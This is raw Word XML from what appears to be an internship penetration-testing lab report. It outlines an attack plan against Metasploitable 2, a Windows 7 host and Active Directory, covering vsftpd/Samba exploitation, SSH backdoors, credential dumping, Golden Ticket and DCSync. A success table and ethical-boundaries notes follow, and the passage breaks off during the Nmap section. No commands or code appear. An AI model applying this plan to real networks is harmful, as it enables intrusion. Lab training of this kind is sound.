    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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Gain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initial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shell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access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remote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exploit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(vsftpd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/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Samba)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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Escalate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privileges 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root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Linux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target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="15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Establish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persistence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(SSH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backdoor,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scheduled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tasks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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Pivot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network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reach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Windows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7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machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="10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Dump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credentials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Windows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machine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pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="142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2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="79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Enumerate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Active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Directory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environment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identify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attack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paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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Achieve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Domain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Admin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status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via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Golden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Ticket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/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DCSync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="15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Establish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resilient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forest-level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persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="65"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Criteria:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="17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7"/>
        <w:gridCol w:w="4533"/>
        <w:gridCol w:w="1707"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="635" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="315" w:lineRule="exact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Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="315" w:lineRule="exact"/>
              <w:ind w:left="109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Success</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-11"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="314" w:lineRule="exact"/>
              <w:ind w:left="108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Week</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="301" w:lineRule="exact"/>
              <w:ind w:left="10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Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="585" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="290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Network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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="290" w:lineRule="exact"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Full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port/service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map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with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vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="2"/>
              <w:ind w:left="10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matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="290" w:lineRule="exact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Week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02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="585" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="289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Initial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Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="289" w:lineRule="exact"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Remote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shell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obtained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via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Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="2"/>
              <w:ind w:left="10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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="289" w:lineRule="exact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Week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03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="295" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Privilege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Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Root/SYSTEM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z w:val="24"/>
              </w:rPr>
              <w:t>access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confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1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Week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05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="287" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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8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Credential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Harvesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="453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8" w:lineRule="exact"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>NTLM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hashes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extracted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cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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8" w:lineRule="exact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Week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04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="292" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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3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Lateral</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t> Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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3" w:lineRule="exact"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>RDP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/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WMI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access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to Windows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7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machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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3" w:lineRule="exact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Week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04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="290" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270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AD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BloodHound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attack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paths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identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact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Week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07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="295" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t> Dominance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Domain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Admin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via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Golden</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t> Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="274" w:lineRule="exact" w:before="1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Week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08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="585" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4533" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="291" w:lineRule="exact" w:before="1"/>
              <w:ind w:left="109"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Multiple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mechanisms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survive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password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="272" w:lineRule="exact"/>
              <w:ind w:left="10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resets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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Week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08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="220"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ethical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="218" w:after="0"/>
        <w:ind w:left="1441" w:right="1435" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All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testing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was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conducted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controlled,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isolated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lab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environment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real-world systems at risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1441" w:right="2258" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>No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unauthorized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access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production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system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third-party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network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was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>performed.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304" w:lineRule="exact" w:before="0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All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activities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were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supervised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internship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instructor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Mr.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Umar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Niaz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="8" w:after="0"/>
        <w:ind w:left="1441" w:right="1223" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence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consent: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structured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training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exercise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within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Cyberster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Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Internship.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99"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:ind w:left="578" w:right="359"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Professional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fundamentally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="35"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>planning,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>legal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>boundaries,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="242" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="720" w:right="1129"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>documented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>methodology-not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>impulsive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>clicking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>phase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engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>planned, documented, and executed within a defined scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="242" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>02#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Execution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Cyber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720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sections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>document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end-to-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>across 10 weeks, from external reconnaissance to full Domain Dominance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reconnaissance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/>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="216"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>began</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scanning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map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and services on the target machine (Metasploitable 2).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65533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5662338" cy="4582858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338" cy="4582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ind w:left="537" w:right="359"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
